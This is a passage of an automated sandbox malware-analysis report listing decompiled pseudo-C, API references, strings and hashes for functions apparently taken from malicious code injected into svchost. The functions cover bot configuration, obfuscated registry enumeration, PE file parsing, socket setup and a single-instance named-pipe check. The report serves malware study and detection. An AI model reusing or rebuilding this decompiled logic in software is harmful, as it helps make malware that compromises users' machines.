				_t67 = E0032E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_t74 = E00321BDF(); // executed
					_v200 = _t74;
					E0032EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x61;
				_t96 = E0032E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 8;
					E0032EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				_t69 = E003230B5(); // executed
				 *((intOrPtr*)(_t105 + 0x34)) = _t69;
				if( *0x33201d == 0) {
					if( *0x33201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00326EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x332110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}

0x00321d9f
0x00321da9
0x00321daf
0x00321db4
0x00321dbc
0x00321dbe
0x00321dce
0x00321de0
0x00321dd0
0x00321ddb
0x00321ddb
0x00321de8
0x00321dfc
0x00321dff
0x00321e10
0x00321e14
0x00321e22
0x00321e22
0x00321e2a
0x00321e34
0x00321e38
0x00321e3e
0x00321e46
0x00321e4e
0x00321e51
0x00321e54
0x00321e59
0x00321e64
0x00321e67
0x00321e72
0x00321e77
0x00321e77
0x00321e7f
0x00321e84
0x00321e8e
0x00321e93
0x00321e96
0x00321e99
0x00321ea0
0x00321ea8
0x00321ea2
0x00321ea2
0x00321ea2
0x00321eb4
0x00321eb9
0x00321ebc
0x00321ec1
0x00321ec9
0x00321ed3
0x00321ed8
0x00321edb
0x00321ede
0x00321ede
0x00321ee1
0x00321ee9
0x00321eee
0x00321ef1
0x00321ef6
0x00321ef8
0x00321f01
0x00321f05
0x00321f0e
0x00321f11
0x00321f11
0x00321f16
0x00321f1e
0x00321f23
0x00321f26
0x00321f2b
0x00321f2d
0x00321f36
0x00321f3a
0x00321f43
0x00321f46
0x00321f46
0x00321f52
0x00321f5e
0x00321f65
0x00321f69
0x00321f72
0x00321f77
0x00321f7a
0x00321f7d
0x00321f82
0x00321f8c
0x00321f9a
0x00321fb7
0x00321f9c
0x00321fa3
0x00321fae
0x00321fa5
0x00321fa5
0x00321fa5
0x00321fa3
0x00321f8e
0x00321f8e
0x00321f8e
0x00321fc0
0x00321fc2
0x00321fc2
0x00321fd6
0x00321fd9
0x00321fde
0x00321fea

APIs

GetVersionExA.KERNEL32 ref: 00321DC6
GetSystemInfo.KERNELBASE(?), ref: 00321DE8
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00321E03
GetProcAddress.KERNEL32(00000000), ref: 00321E0A
GetCurrentProcess.KERNEL32(?), ref: 00321E1B
GetTickCount.KERNEL32 ref: 00321FC9

Part of subcall function 00321BDF: GetComputerNameA.KERNEL32 ref: 00321C15

Strings

localcfg, xrefs: 00321E2A, 00321E31, 00321E44, 00321E7D, 00321E8C, 00321EB2, 00321ED1, 00321EE7, 00321EFF, 00321F1C, 00321F34, 00321F50, 00321F70
start_srv, xrefs: 00321E6C
kernel32, xrefs: 00321DF7
born_date, xrefs: 00321EAD, 00321ECC
work_srv, xrefs: 00321E5E
net_type, xrefs: 00321E87
lid_file_upd, xrefs: 00321E25
flags_upd, xrefs: 00321E3E, 00321E43, 00321E7C
hi_id, xrefs: 00321F16, 00321F1B, 00321F33
IsWow64Process, xrefs: 00321DF2
loader_id, xrefs: 00321F4B, 00321F6B

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
API String ID: 4207808166-1381319158
Opcode ID: 970f768f2d90bedd9eb683cdb529ab35d3812c59b5039ae4a6a98fe6e79b263e
Instruction ID: 6d08bbee2e2addcc9a3e03938e18d832650640f6154e0dd02de7635ead32f1c9
Opcode Fuzzy Hash: 970f768f2d90bedd9eb683cdb529ab35d3812c59b5039ae4a6a98fe6e79b263e
Instruction Fuzzy Hash: FB5114B09043546FE336AF75ADC6F67BAECEF54B04F04091CF89686142D774A904C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 003273FF, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E003273FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0;
				}
				_v32 = E00326DC2(_t165);
				_t160 = 0xe4;
				_t91 = E00322544(0x3322f8, 0x3306e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x3322f8);
				if(_t92 != 0) {
					_t93 = E0032EE2A(_t165);
					goto L66;
				} else {
					E0032EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00326CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0032F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x61616161) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0032EE2A(_t167, 0x3322f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0032EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00322544(0x3322f8, 0x3306dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0032EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0032EE95(_v8, E00322544(0x3322f8, 0x330694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0032ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0032EF00( &_v296,  &_v295);
							_t127 = E0032ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0032EE95( &_v296,  &_v556);
						_v28 = E0032EE95(_v8, E00322544(0x3322f8, 0x330694, 5, _t160, 0xc8));
						E0032EE2A(_t167, 0x3322f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0032ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0032ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00326CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0032F1A5(_v8) ^ 0x61616161;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00326C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0032EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0032EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0032EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}

0x003273ff
0x00327408
0x0032740e
0x00327410
0x00327419
0x0032741b
0x0032741b
0x0032741d
0x00327422
0x00327424
0x00327424
0x00327426
0x0032742b
0x0032742d
0x0032742d
0x00327430
0x00327435
0x00327437
0x00327437
0x0032743f
0x00327451
0x00327464
0x00327469
0x00327472
0x00327478
0x0032747d
0x0032747e
0x00327481
0x003277f9
0x00000000
0x00327487
0x00327487
0x0032748c
0x0032748f
0x00327498
0x00327499
0x0032749c
0x00327703
0x00327706
0x0032770e
0x00000000
0x00000000
0x003274b1
0x003276ed
0x003276ed
0x003276f5
0x003276f6
0x003276ff
0x00327700
0x00000000
0x00327700
0x003274be
0x003274c8
0x003274cc
0x00000000
0x00000000
0x003274e6
0x003274e9
0x003274f0
0x003274f8
0x00327727
0x0032772a
0x00327755
0x0032775c
0x00327761
0x003276df
0x003276e2
0x003276e7
0x003276e7
0x00000000
0x003276e2
0x00327736
0x00327740
0x00327745
0x00327745
0x0032774b
0x0032774d
0x003277ec
0x003277ef
0x00000000
0x003277f5
0x0032751c
0x00327521
0x00327528
0x00327530
0x00000000
0x00000000
0x00327536
0x0032753c
0x0032753f
0x0032753f
0x00327541
0x00327542
0x0032754b
0x00000000
0x00000000
0x0032755f
0x00327565
0x00327566
0x0032756b
0x00000000
0x00000000
0x00327589
0x0032758e
0x00327593
0x00327753
0x00000000
0x00327753
0x003275a0
0x003275d1
0x003275d7
0x003275a2
0x003275b0
0x003275be
0x003275c3
0x003275c3
0x003275da
0x003275dc
0x003275dc
0x003275fc
0x00327615
0x00327618
0x0032761d
0x00327620
0x00327623
0x00327626
0x00327626
0x00327628
0x00327629
0x0032762d
0x00327632
0x00327634
0x00327634
0x00327637
0x00327637
0x00327639
0x0032763a
0x0032763e
0x00327642
0x0032765c
0x00327664
0x00327667
0x0032766e
0x00327673
0x00327680
0x00327675
0x0032767b
0x0032767b
0x0032768e
0x00327722
0x00000000
0x00327694
0x003276a1
0x003276ad
0x003276b3
0x003276bf
0x003276d8
0x003276d8
0x003276dd
0x003276dd
0x00000000
0x003276dd
0x003276c1
0x003276c7
0x00000000
0x0032777e
0x00327785
0x00327797
0x00327799
0x00327799
0x0032779a
0x0032779f
0x003277a1
0x003277a1
0x003277a3
0x003277a8
0x003277b3
0x003277b8
0x003277c0
0x003277c0
0x003277c8
0x003277d0
0x003277d6
0x003277d7
0x003277dc
0x003277de
0x003277de
0x003277e0
0x003277e2
0x00000000
0x003277e2
0x003276c7
0x00327769
0x00327773
0x003277e3
0x003277e6
0x00000000
0x003277e6
0x00327642
0x00327717
0x00327801
0x00000000
0x00327801

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,73B743E0,00000000), ref: 00327472
RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,73B743E0,00000000), ref: 003274F0
RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,73B743E0,00000000), ref: 00327528
___ascii_stricmp.LIBCMT ref: 0032764D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,73B743E0,00000000), ref: 003276E7
RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00327706
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 00327717
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,73B743E0,00000000), ref: 00327745
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 003277EF

Part of subcall function 0032F1A5: lstrlenA.KERNEL32(000000C8,000000E4,003322F8,000000C8,00327150,?), ref: 0032F1AD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0032778F
RegCloseKey.KERNELBASE(?), ref: 003277E6

Strings

", xrefs: 00327599

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "
API String ID: 3433985886-123907689
Opcode ID: 7169ca26f053f32f7f0586a91723af899180d640adb23e3b90c372a3e9a4cee7
Instruction ID: cb90b881f7dfd959f7c1de4e277356c4246f6d2f331f3ac83289e6a1e76b6772
Opcode Fuzzy Hash: 7169ca26f053f32f7f0586a91723af899180d640adb23e3b90c372a3e9a4cee7
Instruction Fuzzy Hash: D0C19471904229AFDB139FA9EC46FEEBBBDEF45310F150095F504EA191EB709E448B60

Uniqueness

Uniqueness Score: -1.00%

Function 0032675C, Relevance: 19.7, APIs: 13, Instructions: 199
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0032675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0032EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0032EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}

0x0032676a
0x0032676d
0x00326778
0x0032677e
0x0032677e
0x0032679a
0x0032679c
0x003267a2
0x003267b2
0x003267b2
0x003267b8
0x003267bf
0x003267bf
0x003267c9
0x003267d3
0x003267d9
0x003267df
0x0032696b
0x0032696b
0x003267ed
0x00326801
0x00326804
0x00326807
0x0032680b
0x00000000
0x00326811
0x0032681f
0x00326824
0x00000000
0x0032682a
0x0032683e
0x00326842
0x00000000
0x00326848
0x0032685c
0x00326861
0x00000000
0x00326867
0x00326869
0x0032686c
0x00326876
0x00326878
0x0032687a
0x00326881
0x0032688f
0x00000000
0x00000000
0x00326891
0x0032689e
0x003268ba
0x003268a0
0x003268b2
0x003268b2
0x003268bd
0x003268c3
0x003268c5
0x003268c5
0x003268c8
0x003268ce
0x00000000
0x00000000
0x003268d0
0x00000000
0x003268ce
0x003268d2
0x003268d2
0x003268d5
0x003268df
0x003268e5
0x003268eb
0x003268ed
0x003268ed
0x003268f3
0x003268f9
0x003268fe
0x00000000
0x00326900
0x00326906
0x0032690b
0x0032695a
0x0032695d
0x00326960
0x00326966
0x0032690d
0x0032690d
0x00326920
0x00000000
0x00326922
0x0032694f
0x00326955
0x00326955
0x00326920
0x0032690b
0x003268fe
0x003268df
0x00326861
0x00326842
0x00326824
0x0032680b
0x00326971
0x00326971
0x0032697f
0x00326986

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0032677E
CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0032679A
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 003267B0
SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 003267BF
GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 003267D3
ReadFile.KERNELBASE(000000FF,?,00000040,00328244,00000000,?,73B743E0,00000000), ref: 00326807
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0032681F
ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0032683E
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0032685C
ReadFile.KERNEL32(000000FF,?,00000028,00328244,00000000,?,73B743E0,00000000), ref: 0032688B
SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,73B743E0,00000000), ref: 00326906
ReadFile.KERNEL32(000000FF,?,00000000,00328244,00000000,?,73B743E0,00000000), ref: 0032691C
FindCloseChangeNotification.KERNELBASE(000000FF,?,73B743E0,00000000), ref: 00326971

Part of subcall function 0032EC2E: GetProcessHeap.KERNEL32(00000000,'2,00000000,0032EA27,00000000), ref: 0032EC41
Part of subcall function 0032EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0032EC48

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
String ID:
API String ID: 1400801100-0
Opcode ID: 820538c939853c26167c70ce05c834ea08688a9f19c82e7de4c097bf59a53680
Instruction ID: 400edc7e9ee4e56f8a7da7a9e5176252d123ee2751e1b0aff95052cf5dfb80fd
Opcode Fuzzy Hash: 820538c939853c26167c70ce05c834ea08688a9f19c82e7de4c097bf59a53680
Instruction Fuzzy Hash: 51711971D0022DEFDF169FA4DC81AEEBBB9FF04314F10456AE515A6190E7309E92DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0032F315, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(0032CA1D), ref: 0032F34D
socket.WS2_32(00000002,00000001,00000000), ref: 0032F367
closesocket.WS2_32(00000000), ref: 0032F375

Strings

time_cfg, xrefs: 0032F323
ps, xrefs: 0032F375, 0032F3A0

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg
API String ID: 311057483-1008165782
Opcode ID: e374153009f980aefa097399c291c5c10f404779e43e01c59bdf105d67dae95c
Instruction ID: c2b61c5067c1948e279bdd12023d4dcb2bc420d07f7a3bbebc902f96729bf3db
Opcode Fuzzy Hash: e374153009f980aefa097399c291c5c10f404779e43e01c59bdf105d67dae95c
Instruction Fuzzy Hash: 22317A76900128AFDB12DFA5EC899EF7BBCEF88314F104576FA15E3151E7709A418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0032405E, Relevance: 16.7, APIs: 11, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0032405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t46;
				int _t47;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00324000(E00323ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x3322f8;
					if(_t43 == 0) {
						L10:
						E0032EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t46 = CreateNamedPipeA(E00323ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0); // executed
							_t99 = _t46;
							if(_t99 != 0xffffffff) {
								goto L14;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						while(1) {
							L14:
							_t47 = ConnectNamedPipe(_t99, 0); // executed
							if(_t47 != 0) {
								goto L16;
							}
							L15:
							_t71 = GetLastError();
							asm("sbb eax, eax");
							if( ~(_t71 - 0x217) + 1 == 0) {
								L25:
								DisconnectNamedPipe(_t99);
								continue;
								do {
									while(1) {
										L14:
										_t47 = ConnectNamedPipe(_t99, 0); // executed
										if(_t47 != 0) {
											goto L16;
										}
										goto L15;
									}
									L22:
								} while (_v28 != 1);
								E00323F18(_t99,  &_v8, 4, _t92, _t102);
								_t103 = _t104 + 0x14;
								if(_v32 == 0) {
									_t102 = CloseHandle;
									CloseHandle(_t99);
									CloseHandle(_t92);
									E0032E318();
									L8:
									ExitProcess(0);
								}
								 *0x33215a =  *0x33215a + 1;
								do {
									L14:
									_t47 = ConnectNamedPipe(_t99, 0); // executed
									if(_t47 != 0) {
										goto L16;
									}
									goto L15;
								} while (_t49 == 0);
								_t92 = _v16;
								_v8 = (_v12 >> 2) + _v12;
								E00323F18(_t99,  &_v8, 4, _t92, _t102);
								_t56 = E00323F8C(_t99,  &_v12, 4, _t92, _t102);
								_t104 = _t104 + 0x28;
								if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
									goto L25;
								} else {
									_t62 = E00323F8C(_t99,  &_v28, 8, _t92, _t102);
									_t104 = _t104 + 0x14;
									if(_t62 == 0 || _v24 != 0xc) {
										goto L25;
									} else {
										_t64 = E00323F8C(_t99,  &_v40, 0xc, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t64 == 0) {
											goto L25;
										}
										goto L22;
									}
								}
							}
							L16:
							_t49 = E00323F8C(_t99,  &_v12, 4, _v16, _t102);
							_t104 = _t104 + 0x14;
						}
					}
					E0032EE2A(_t97, 0x3322f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0032ECA5();
					E00323F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00323F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00323F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}

0x0032405e
0x0032406d
0x00324070
0x00324076
0x0032407b
0x00324090
0x00324096
0x00324097
0x0032409c
0x003240a1
0x003240a8
0x00324130
0x00324134
0x00324139
0x0032413e
0x0032413f
0x00324153
0x0032415a
0x00324160
0x00324165
0x00000000
0x00000000
0x0032416c
0x00324174
0x00000000
0x00000000
0x00324179
0x00000000
0x00324182
0x00324188
0x00324188
0x0032418b
0x00324193
0x00000000
0x00000000
0x00324195
0x00324195
0x003241a2
0x003241a5
0x0032425e
0x0032425f
0x00324265
0x00324188
0x00324188
0x00324188
0x0032418b
0x00324193
0x00000000
0x00000000
0x00000000
0x00324193
0x00324232
0x00324232
0x00324245
0x0032424a
0x00324251
0x0032426a
0x00324271
0x00324274
0x00324276
0x0032411f
0x00324121
0x00324121
0x00324253
0x00324188
0x00324188
0x0032418b
0x00324193
0x00000000
0x00000000
0x00000000
0x00324193
0x003241c5
0x003241d0
0x003241da
0x003241e8
0x003241ed
0x003241f2
0x00000000
0x00324202
0x0032420b
0x00324210
0x00324215
0x00000000
0x0032421d
0x00324226
0x0032422b
0x00324230
0x00000000
0x00000000
0x00000000
0x00324230
0x00324215
0x003241f2
0x003241ab
0x003241b6
0x003241bb
0x003241be
0x00324188
0x003240b2
0x003240b7
0x003240be
0x00000000
0x00000000
0x003240c9
0x003240d5
0x003240e7
0x003240ec
0x003240f1
0x0032412a
0x00000000
0x00324101
0x0032410b
0x00324117
0x0032411c
